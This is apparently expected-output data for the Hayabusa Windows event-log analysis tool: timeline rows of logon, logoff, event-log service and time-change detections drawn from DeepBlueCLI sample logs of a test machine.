+2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:04:53.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:05:33.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:06:22.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:18:24.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:19:51.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:21:52.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:23:07.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x39a20,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a20 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a67 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x39a67,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:35:55.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:36:43.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x24902,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24902 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24936 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x24936,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:44:06.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:45:59.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19489,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19489 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x194bb | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x194bb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:54:08.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:00.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19153,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19153 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x1917f | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1917f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:52:14.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:54:22.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x2b15e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b15e | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b18a | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2b18a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:06:17.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:07:33.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x25519,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x25519 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2553c | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process:  | Target Server: cifs/rdavis-7.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x15f454,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x15f454,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f454,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x15f53a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f546,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0x15f53a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2553c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:54:10.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:29.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xdad4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdad4 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdafc | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,info,,Logon Type 4 - Batch,User: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x13dbc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x13dbc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xdafc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdafc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,info,,Logoff,User: IEUser | LID: 0xdad4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x4bafc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bafc | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
